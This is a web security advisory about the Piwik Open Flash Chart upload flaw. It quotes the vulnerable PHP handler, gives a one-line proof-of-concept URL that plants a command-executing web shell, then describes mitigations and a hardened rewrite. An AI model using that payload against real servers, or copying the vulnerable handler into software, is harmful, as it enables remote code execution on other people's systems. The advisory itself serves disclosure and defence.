Security Information and Review

Collection of security information and review

Piwik and Open Flash Chart Vulnerability

Author: Admin

A vulnerability has been discovered in the Open Flash Chart module bundled with Piwik which can be exploited by malicious people to compromise a vulnerable system. The vulnerability exists in Piwik's implementation of "open-flash-chart", a module which resides in the "./libs/open-flash-chart/php-ofc-library" directory.

Piwik is an open source web analytics application released under the GPL. Much like Google Analytics, it provides detailed reports on a website's visitors, its popular pages, the search engine keywords they used, the language they speak, and much more. It gives real-time reports in detail, and every feature is built as a plugin, so features can be added and removed easily.

The vulnerable code makes Piwik create a directory called "./libs/open-flash-chart/tmp-upload-images" and then writes a file into it whose content can be PHP code. The issue is caused by missing input validation in the "libs/open-flash-chart/php-ofc-library/ofc_upload_image.php" script when processing the "name" parameter, which could be exploited by remote attackers to create malicious PHP scripts on a vulnerable system and execute arbitrary commands with the privileges of the web server. The code does not behave this way, however, if global variables cannot be overwritten by request parameters.

The chronology of this vulnerability in Piwik's Open Flash Chart implementation follows below in detail, taken from an analysis of the Piwik code.

<?php
 
    /* Default path for temporary files written when an image is uploaded */
    $default_path = '../tmp-upload-images/';
 
    /* Check whether the $default_path directory exists */
    if (!file_exists($default_path)) 
        /* If it does not, create it with full (world-writable) permissions */
        mkdir($default_path, 0777, true);
 
    /* Then create a file in that directory, named after the request parameter "name" */
    /* This parameter is not sanitised before use: any extension, including .php, is accepted */
    $destination = $default_path . basename( $_GET[ 'name' ] );  
 
    echo 'Saving your image to: '. $destination; 
 
    /* The raw request body is written verbatim into that file; an attacker controls both */
    /* the file name above and the content below, so PHP code can be planted here */
    $jfh = fopen($destination, 'w') or die("can't open file"); 
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);
 
?>

An attacker can exploit this hole to compromise a vulnerable system; the proof of concept is:

 
	./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>

So, how do we fix this vulnerability? Restrict access to the "/libs/open-flash-chart/php-ofc-library" directory (e.g. via an ".htaccess" file), or edit the vulnerable Open Flash Chart code in Piwik shown above. Note that the vulnerable file may be absent from other implementations of the Open Flash Chart library.
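As an added example (not Piwik's or Open Flash Chart's own code), here is a hardened rewrite of the upload handler shown above. It assumes the uploads belong under a fixed directory, that only PNG and JPEG images are expected, and that the server, not the client, chooses the file name. The request body is read from php://input rather than the global $HTTP_RAW_POST_DATA, so no request parameter can substitute for it.

```php
<?php
// Added example, not code from Piwik or Open Flash Chart.
// Assumptions: a fixed upload directory, PNG/JPEG only, server-chosen names.
declare(strict_types=1);

// Fixed upload directory; realpath() below confirms the final path stays inside it.
const UPLOAD_DIR = __DIR__ . '/../tmp-upload-images';
// Accepted MIME types mapped to the extension the server will write.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg'];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate the request and return the path of the saved image, or throw.
 * $requestedName is only used as a hint for the file name; its extension is ignored.
 */
function save_uploaded_image(string $rawBody, string $requestedName): string
{
    // 1. Reject empty and oversized bodies before doing any work.
    if ($rawBody === '' || strlen($rawBody) > MAX_BYTES) {
        throw new RuntimeException('empty or oversized body');
    }

    // 2. Verify the content really is an image by its magic bytes, not by the
    //    client-supplied name. getimagesizefromstring() returns false otherwise.
    $info = @getimagesizefromstring($rawBody);
    if ($info === false || !isset(ALLOWED_TYPES[$info['mime']])) {
        throw new RuntimeException('body is not a PNG or JPEG image');
    }
    $ext = ALLOWED_TYPES[$info['mime']];

    // 3. Reduce the client name to a short run of safe characters and drop its extension.
    $hint = substr(preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($requestedName, PATHINFO_FILENAME)), 0, 32);
    if ($hint === '') {
        $hint = 'image';
    }
    // Server-chosen random suffix so names cannot be predicted or collide.
    $fileName = $hint . '-' . bin2hex(random_bytes(8)) . '.' . $ext;

    // 4. Create the directory without world-writable permissions.
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $base = realpath(UPLOAD_DIR);
    if ($base === false) {
        throw new RuntimeException('upload directory unavailable');
    }
    $destination = $base . DIRECTORY_SEPARATOR . $fileName;

    // 5. Defence in depth: confirm the final path is still inside the upload directory.
    if (strpos($destination, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('path escapes upload directory');
    }

    // 6. Exclusive-create ('x') so an existing file is never overwritten.
    $fh = fopen($destination, 'x');
    if ($fh === false) {
        throw new RuntimeException('cannot create file');
    }
    fwrite($fh, $rawBody);
    fclose($fh);
    chmod($destination, 0640);

    return $destination;
}

// Entry point: POST only, body from php://input, and the echoed name is escaped.
if (PHP_SAPI !== 'cli') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit;
    }
    try {
        $saved = save_uploaded_image(file_get_contents('php://input'), $_GET['name'] ?? '');
        echo 'Saved image as ' . htmlspecialchars(basename($saved), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected';
    }
}
```

The three changes that matter most relative to the original are that the extension is derived from the verified image type rather than from "name", that the body comes from php://input instead of a global that request parameters could overwrite, and that the directory is no longer created 0777. These complement, rather than replace, the access restriction on the php-ofc-library directory suggested above, since the web server should also be configured not to execute scripts from the upload directory.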

Mohamad Widodo

Categories: Web Application Security